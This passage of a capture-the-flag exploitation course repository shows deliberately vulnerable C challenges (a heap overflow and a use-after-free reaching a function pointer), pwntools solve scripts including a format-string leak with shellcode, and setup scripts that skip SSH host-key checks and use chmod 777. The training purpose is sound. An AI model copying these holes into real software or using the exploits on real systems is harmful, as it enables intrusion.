
    r.recvuntil('exit - close program')
    # Round 1: a positional %x in the name field makes the target print one
    # stack word.
    send(r, msg_name='%5$x', msg_content="aaaa")
    r.recvuntil('name: \"')
    # 0x13 is a hard-coded correction specific to this build's stack layout.
    stack_ret = int(r.recvline().strip(), 16) - 0x13
    log.info('stack ret: {stack_ret}'.format(stack_ret=hex(stack_ret)))

    r.recvuntil('exit - close program')
    # Round 2: 128 filler bytes, a stack address and the payload; this only
    # works because compile.sh builds with an executable stack.
    send(r, msg_name='angel',
         msg_content=cyclic(128) + pack(stack_ret+4, word_size=32) + shell_code)

    # `time` is not imported here; presumably it arrives via `from pwn import *`.
    time.sleep(1)
    r.sendline('cat flag')
    r.recvuntil('zenysec')
    # NOTE(review): str + recvuntil() assumes Python 2 pwntools.
    flag = 'zenysec' + r.recvuntil('\n')
    log.success('The flag is: {flag}'.format(flag=flag))
    r.close()


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Exploit ch08')
    parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution')
    main(**vars(parser.parse_args()))

--------------------------------------------------------------------------------
/writeups/i386/ch08/flag:
--------------------------------------------------------------------------------
zenysec{flag}

--------------------------------------------------------------------------------
/writeups/i386/ch09/ch09:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch09/ch09
--------------------------------------------------------------------------------
/writeups/i386/ch09/ch09.c:
--------------------------------------------------------------------------------
//__author__ = '@tomereyz'
// Training exercise: a heap buffer overflow next to a function pointer.
// NOTE(review): the header names after #include were lost when this page was
// extracted; restore them from the repository before compiling.
#include
#include
#include

#define BUF_SIZE 50

// A message: two fixed-size text fields.
typedef struct{
    char name[BUF_SIZE];
    char content[BUF_SIZE];
} message;

// Two filler fields followed by a function pointer.
typedef struct{
    char junk01[BUF_SIZE];
    char junk02[BUF_SIZE];
    void (*func_ptr)();
} important;

// Prints the flag file through the shell. Nothing in this file calls it.
void secret(){
    system("cat flag");
}

// Allocates a message and an `important` object, reads the message fields,
// calls object_01->func_ptr if it is non-NULL, then echoes the message.
void send(){

    // Neither malloc result is checked, and neither block is freed before
    // the function returns.
    message* msg = (message*) malloc(sizeof(message));
    // malloc does not clear memory and func_ptr is never assigned, so the
    // pointer tested below is indeterminate even on well-formed input.
    // calloc, or an explicit object_01->func_ptr = NULL, would define it.
    important* object_01 = (important*) malloc(sizeof(important));

    printf("Creating message\n");
    printf("Enter message name:");
    fgets(msg->name, BUF_SIZE, stdin);
    printf("Enter message content:");
    // gets() has no length limit: input longer than content[] runs past the
    // end of the msg allocation. object_01 was allocated right after msg,
    // so it is presumably the next heap chunk - TODO confirm.
    // The bounded form is fgets(msg->content, sizeof(msg->content), stdin).
    gets(msg->content);

    // Indirect call through a pointer that lives in heap memory reachable by
    // the overflow above.
    if (object_01->func_ptr){
        object_01->func_ptr();
    }

    printf("name: \"%s\"\ncontent:\"%s\"\n", msg->name, msg->content);
}

// Prints the menu, reads one command line and dispatches it.
// Returns 0 for "exit" and 1 for everything else.
int menu(){
    char buffer[BUF_SIZE] = {0};

    printf("[*] menu\n");
    printf("menu - show this menu\n");
    printf("send - send new message\n");
    printf("exit - close program\n");

    fgets(buffer, BUF_SIZE, stdin);

    if (strcmp(buffer, "menu\n") == 0){
        return 1;
    }
    else if (strcmp(buffer, "send\n") == 0){
        send();
        return 1;
    }
    else if (strcmp(buffer, "exit\n") == 0){
        return 0;
    }
    else{
        printf("Unknown command: %s", buffer);
        return 1;
    }

}

// Entry point: unbuffered stdout, then the menu loop until "exit".
int main(int argc, char **argv){
    setbuf(stdout, NULL);
    // Sets real, effective and saved uid to the current effective uid.
    // The return value of setresuid() is not checked.
    uid_t uid = geteuid();
    setresuid(uid,uid,uid);
    printf("Welcome to ch09!\n");
    while(1){
        if (!(menu())){
            break;
        }
        printf("\n");
    }
    printf("Exiting...\n");
}

--------------------------------------------------------------------------------
/writeups/i386/ch09/compile.sh:
--------------------------------------------------------------------------------
# Static, non-PIE build. $1 is the challenge directory; it is used unquoted.
gcc $1/ch09.c -static -no-pie -o $1/ch09

--------------------------------------------------------------------------------
/writeups/i386/ch09/exploit.py:
--------------------------------------------------------------------------------
__author__ = '@tomereyz'

from pwn import *
from I386Exploit import I386Exploit
import argparse


def send(r, msg_name, msg_content):
    """Walk the target's ``send`` menu command over the open tube *r*.

    Sends the command word, then answers the name and content prompts in order.
    """
    r.sendline('send')
    r.recvuntil('Enter message name:')
    r.sendline(msg_name)
    r.recvuntil('Enter message content:')
    r.sendline(msg_content)


def main(execution):
    """Run the ch09 solve script and log the flag line.

    Targets the unbounded ``gets(msg->content)`` in ch09.c.
    *execution* is handed to ``I386Exploit`` (defined outside this listing).
    """
    challenge_name = 'ch09'
    log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name))
    r = I386Exploit(challenge_name=challenge_name, execution=execution).r

    # Fixed address taken from the on-disk ELF; assumes a non-PIE build.
    secret_func_addr = ELF(challenge_name).functions['secret'].address
    r.recvuntil('exit - close program')
    # 162 filler bytes, then the address. The count is specific to this
    # build's heap layout (allocator chunk sizes and struct padding).
    send(r, msg_name='angel', msg_content=cyclic(162) + pack(secret_func_addr, word_size=32))

    r.recvuntil('zenysec')
    # NOTE(review): str concatenation with pwntools values assumes Python 2.
    flag = 'zenysec' + r.recvuntil('\n')
    log.success('The flag is: {flag}'.format(flag=flag))
    r.close()


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Exploit ch09')
    parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution')
    main(**vars(parser.parse_args()))

--------------------------------------------------------------------------------
/writeups/i386/ch09/flag:
--------------------------------------------------------------------------------
zenysec{flag}

--------------------------------------------------------------------------------
/writeups/i386/ch10/ch10:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch10/ch10
--------------------------------------------------------------------------------
/writeups/i386/ch10/ch10.c:
--------------------------------------------------------------------------------
//__author__ = '@tomereyz'
// Training exercise: a use-after-free on the global worker object.
// NOTE(review): the header names after #include were lost when this page was
// extracted; restore them from the repository before compiling.
#include
#include
#include

#define BUF_SIZE 50

// A message: two fixed-size text fields.
typedef struct{
    char name[BUF_SIZE];
    char content[BUF_SIZE];
} message;

// Two filler fields followed by a function pointer.
typedef struct{
    char junk01[BUF_SIZE];
    char junk02[BUF_SIZE];
    void (*func_ptr)();
} important;

// The current worker; NULL until create_worker() runs.
important* work;

// Default worker action.
void func(){
    printf("[*] Working\n");
}

// Prints the flag file through the shell. Nothing in this file calls it.
void secret(){
    system("cat flag");
}

// Allocates a worker and points it at func(). A previous worker, if any, is
// overwritten without being freed; the malloc result is not checked.
void create_worker(){
    work = (important*) malloc(sizeof(important));
    work->func_ptr = func;
    // Prints the heap address of the worker to the user.
    printf("Worker Created in %p\n", work);
}

// Calls the worker's function pointer. There is no check that a worker
// exists: before create_worker() this dereferences NULL, and after
// free_worker() it reads freed memory.
void start_worker(){
    work->func_ptr();
}

// Frees the worker but leaves `work` pointing at the freed block, so a later
// start_worker() or a second free_worker() operates on freed memory.
// Setting work = NULL here (and checking it in start_worker) closes that gap.
void free_worker(){
    free(work);
}

// Allocates a message, reads its fields and echoes them. The message is
// never freed.
void send(){
    // A request of similar size right after free_worker() may be served from
    // the block the worker occupied, depending on the allocator.
    message* msg = (message*) malloc(sizeof(message));
    // Prints the heap address of the message to the user.
    printf("Message Created in %p\n", msg);

    printf("Creating message\n");
    printf("Enter message name:");
    fgets(msg->name, BUF_SIZE, stdin);
    printf("Enter message content:");
    // gets() has no length limit: input longer than content[] runs past the
    // end of the msg allocation. The bounded form is
    // fgets(msg->content, sizeof(msg->content), stdin).
    gets(msg->content);
    printf("name: \"%s\"\ncontent:\"%s\"\n", msg->name, msg->content);
}

// Prints the menu, reads one command line and dispatches it.
// Returns 0 for "exit" and 1 for everything else.
int menu(){
    char buffer[BUF_SIZE] = {0};

    printf("[*] menu\n");
    printf("menu - show this menu\n");
    printf("send - send new message\n");
    printf("create_worker - create worker\n");
    printf("start_worker - run worker\n");
    printf("free_worker - free current worker\n");
    printf("exit - close program\n");

    fgets(buffer, BUF_SIZE, stdin);

    if (strcmp(buffer, "menu\n") == 0){
        return 1;
    }
    else if (strcmp(buffer, "create_worker\n") == 0){
        create_worker();
        return 1;
    }
    else if (strcmp(buffer, "start_worker\n") == 0){
        start_worker();
        return 1;
    }
    else if (strcmp(buffer, "free_worker\n") == 0){
        free_worker();
        return 1;
    }
    else if (strcmp(buffer, "send\n") == 0){
        send();
        return 1;
    }
    else if (strcmp(buffer, "exit\n") == 0){
        return 0;
    }
    else{
        printf("Unknown command: %s", buffer);
        return 1;
    }

}

// Entry point: unbuffered stdout, then the menu loop until "exit".
int main(int argc, char **argv){
    setbuf(stdout, NULL);
    // Sets real, effective and saved uid to the current effective uid.
    // The return value of setresuid() is not checked.
    uid_t uid = geteuid();
    setresuid(uid,uid,uid);
    printf("Welcome to ch10!\n");
    while(1){
        if (!(menu())){
            break;
        }
        printf("\n");
    }
    printf("Exiting...\n");
}

--------------------------------------------------------------------------------
/writeups/i386/ch10/compile.sh:
--------------------------------------------------------------------------------
# Static, non-PIE build. $1 is the challenge directory; it is used unquoted.
gcc $1/ch10.c -static -no-pie -o $1/ch10

--------------------------------------------------------------------------------
/writeups/i386/ch10/exploit.py:
--------------------------------------------------------------------------------
__author__ = '@tomereyz'

from pwn import *
from I386Exploit import I386Exploit
import argparse


def free_worker(r):
    """Send the ``free_worker`` menu command."""
    r.sendline('free_worker')


def start_worker(r):
    """Send the ``start_worker`` menu command."""
    r.sendline('start_worker')


def create_worker(r):
    """Send the ``create_worker`` menu command."""
    r.sendline('create_worker')


def send(r, msg_name, msg_content):
    """Walk the target's ``send`` menu command over the open tube *r*.

    Sends the command word, then answers the name and content prompts in order.
    """
    r.sendline('send')
    r.recvuntil('Enter message name:')
    r.sendline(msg_name)
    r.recvuntil('Enter message content:')
    r.sendline(msg_content)


def main(execution):
    """Run the ch10 solve script and log the flag line.

    Issues create, free, send, start in that order, which exercises the
    dangling ``work`` pointer left behind by ``free_worker`` in ch10.c.
    *execution* is handed to ``I386Exploit`` (defined outside this listing).
    """
    challenge_name = 'ch10'
    log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name))
    r = I386Exploit(challenge_name=challenge_name, execution=execution).r

    # Fixed address taken from the on-disk ELF; assumes a non-PIE build.
    secret_func_addr = ELF(challenge_name).functions['secret'].address
    r.recvuntil('exit - close program')

    create_worker(r)
    free_worker(r)
    # 50 filler bytes for content[], then the address; assumes the message is
    # placed in the block the worker just released - allocator dependent.
    send(r, msg_name='angel', msg_content=cyclic(50) + pack(secret_func_addr, word_size=32))
    start_worker(r)

    r.recvuntil('zenysec')
    # NOTE(review): str concatenation with pwntools values assumes Python 2.
    flag = 'zenysec' + r.recvuntil('\n')
    log.success('The flag is: {flag}'.format(flag=flag))
    r.close()


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Exploit ch10')
    parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution')
    main(**vars(parser.parse_args()))

--------------------------------------------------------------------------------
/writeups/i386/ch10/flag:
--------------------------------------------------------------------------------
zenysec{flag}

--------------------------------------------------------------------------------
/writeups/i386/gdb_plugin.sh:
--------------------------------------------------------------------------------
# Despite the .sh name this is a gdb command file: it defines a user command
# `xhelp` that prints two separator lines.
define xhelp
printf "---------------\n"
printf "---------------\n"
end

--------------------------------------------------------------------------------
/writeups/i386/remote.sh:
--------------------------------------------------------------------------------
#!/usr/bin/env bash

# Prints the banner, requires a project path argument and prepends it to
# PYTHONPATH so the exploit scripts can import I386Exploit.
function welcome(){
    echo "** ZenySec Exercises **"

    if [ -z "$1" ]; then
        echo "usage: ./remote.sh project_path (writeups/i386)"
        exit 1
    fi

    export PYTHONPATH=$1:$PYTHONPATH
}

# Runs every chNN/exploit.py with "-e remote".
function remote(){
    echo "[*] Testing exploits remote..."
    # The names come from `ls` of the current directory, not of $1, and any
    # entry containing "ch" matches.
    for i in `ls | grep ch`; do
        # NOTE(review): $1 and $i are unquoted and the cd result is not
        # checked; if cd fails, exploit.py from the wrong directory would run.
        # After the first `cd ..` the shell sits in $1, so a relative $1
        # presumably stops resolving on later iterations - confirm.
        cd $1/$i
        python exploit.py -e remote
        cd ..
    done
}

function main(){
    welcome $1
    remote $1
}

main $1
echo "[*] Done!"

--------------------------------------------------------------------------------
/writeups/i386/setup.sh:
--------------------------------------------------------------------------------
#!/usr/bin/env bash

# Prints the banner and requires root plus a user-name argument.
function welcome(){
    echo "** ZenySec Exercises **"

    if [[ $EUID -ne 0 ]]; then
        echo "This script must be run as root"
        exit 1
    fi

    if [ -z "$1" ]; then
        echo "usage: ./setup.sh user_name"
        exit 1
    fi
}

# Copies the helper scripts from the exercise server into the current
# directory.
function download_tools(){
    echo "[*] Downloading tools..."
    # NOTE(review): host-key checking is switched off (StrictHostKeyChecking=no
    # with known_hosts sent to /dev/null), so the server's identity is never
    # verified, and this script runs as root and later marks the downloads
    # executable. The password is passed with -p, which exposes it in the
    # process list. Pinning the host key in a known_hosts file avoids the
    # first problem.
    sshpass -p 'welcome' scp -P20000 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no welcome@exercises-i386.zenysec.com:/home/welcome/\{debug.sh,gdb_plugin.sh,run.sh,remote.sh\} .
}

# Copies source, binary and compile.sh for ch00..ch10 into per-challenge
# directories; each account's password is the challenge name.
function download_challenges(){
    echo "[*] Downloading challenges..."

    for i in ch00 ch01 ch02 ch03 ch04 ch05 ch06 ch07 ch08 ch09 ch10; do
        mkdir -p $i
        # Same unverified-host and command-line-password pattern as above;
        # scp failures are not checked.
        sshpass -p $i scp -P20000 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $i@exercises-i386.zenysec.com:/home/$i/\{$i.c,$i,compile.sh\} $i/
    done
}

# Refreshes the package index, then fetches tools and challenges.
function download(){
    # Only updates the index; sshpass itself is not installed here.
    apt-get update

    download_tools
    download_challenges


}

# Hands the downloaded files to user $1 and makes them executable.
function change_permissions(){
    chgrp -R $1 ch*/
    chown -R $1 ch*/
    # World-writable and executable for every file in the challenge
    # directories; owner-only permissions (e.g. 750) would be enough for the
    # user the files were just chown'ed to.
    chmod 777 ch*/*

    chgrp -R $1 *.sh
    chown -R $1 *.sh
    chmod +x *.sh
}

function main(){
    welcome $1
    download $1
    change_permissions $1
}

main $1
echo "[*] Done!"

--------------------------------------------------------------------------------